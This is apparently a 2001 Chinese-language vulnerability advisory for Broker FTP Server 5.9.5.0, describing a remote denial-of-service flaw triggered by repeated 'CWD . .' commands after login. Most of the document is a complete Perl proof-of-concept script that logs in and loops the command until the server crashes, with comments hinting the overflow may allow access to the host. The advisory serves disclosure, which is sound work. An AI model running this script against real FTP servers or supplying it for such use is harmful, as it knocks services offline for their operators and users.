Broker FTP 服务程序存在拒绝服务攻击发布时间:2001-06-14 更新时间:2001-06-14 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Broker FTP Server version 5.9.5.0详细描述 Broker FTP (http://www.ftp-broker.com/)存在一个安全漏洞可以导致拒绝 服务攻击,通过在登陆后重复发送下面命令,可以导致服务器崩溃: CWD . . (在客户端使用CD ". ." ) 测试代码 Exploit: #!/usr/bin/perl # Broker FTP Server 5.9.5.0 DoS proof of concept # # Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd> # Impact : eventually causes an access violation in the TSFTPSRV process # the buffer overflow might be exploitable and be used to gain access # to the FTP Server hostcomputer. # # by [ByteRage] <byterage@yahoo.com> # www.byterage.cjb.net (http://elf.box.sk/byterage/) use IO::Socket; $loginid = "anonymous"; $loginpwd = "anonymous"; if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @ $host:"; if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n"; if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; } if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; } $SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush(); # get daemon banner $reply = ""; sysread($SOCK, $reply, 2000); print $reply; # login syswrite $SOCK, "USER $loginid\015\012"; sysread($SOCK, $reply, 2000); print $reply; syswrite $SOCK, "PASS $loginpwd\015\012"; sysread($SOCK, $reply, 2000); print $reply; sysread($SOCK, $reply, 2000); print "$reply\nSending crash ["; if (substr($reply,0,1) == '2') { # Login succesful, send CWD's $i = 1; while ($i) { $i = syswrite $SOCK, "CWD . .\015\012"; print "."; sleep(1); } print "]\nSocket write failed... possible cause : Host down :(\n"; } close($SOCK); exit(); 解决方案 尚无 相关信息 byterage at yahoo.com |
